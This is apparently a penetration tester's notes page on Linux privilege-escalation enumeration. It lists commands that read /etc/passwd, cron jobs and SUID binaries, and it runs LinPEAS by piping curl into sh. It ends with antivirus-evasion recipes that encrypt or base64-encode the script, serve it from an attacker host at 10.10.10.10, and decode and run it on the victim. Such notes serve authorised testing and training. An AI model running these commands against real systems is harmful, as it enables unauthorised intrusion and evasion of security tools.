Enumeration

id
hostname
env
cat .bashrc
cat /etc/passwd
cat /etc/issue
cat /etc/os-release
uname -a
ps aux # list all processes with our without a tty and in a user readable format.
ip a
routel / route # Get a list of the network routing tables.
netstat -punta / ss --ntpu # List of open ports
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
crontab -l
sudo crontab -l
dpkg -l # List applications installed by dpkg
find / -writable -type d 2>/dev/null
cat /etc/fstab # List all drives that will be mounted at boot time.
mount # List all mounted file systems.
lsblk # List all available Disks
find / -perm -u=s -type f 2>/dev/null # Find all SUID-marked binaries / might take a minute.

Automated Enumeration Checks

Kali Linux has a built in script called unix-privesc-check.

./unix-privesc-check standard > output.txt

My favorite Linux check script is LinPEAS. Depending on the circumstances you might want to pick between the bash script or the binary.

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

They even offer some tips on performing rudimentry AV bypass. Always remember to tweak the password to end up with a different encrypted binary.

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAESencryption -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAESencryption | sh #Download from the victim

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
PreviousLateral MovementNextSSH Private Key Grabbing and Planting

Last updated

Was this helpful?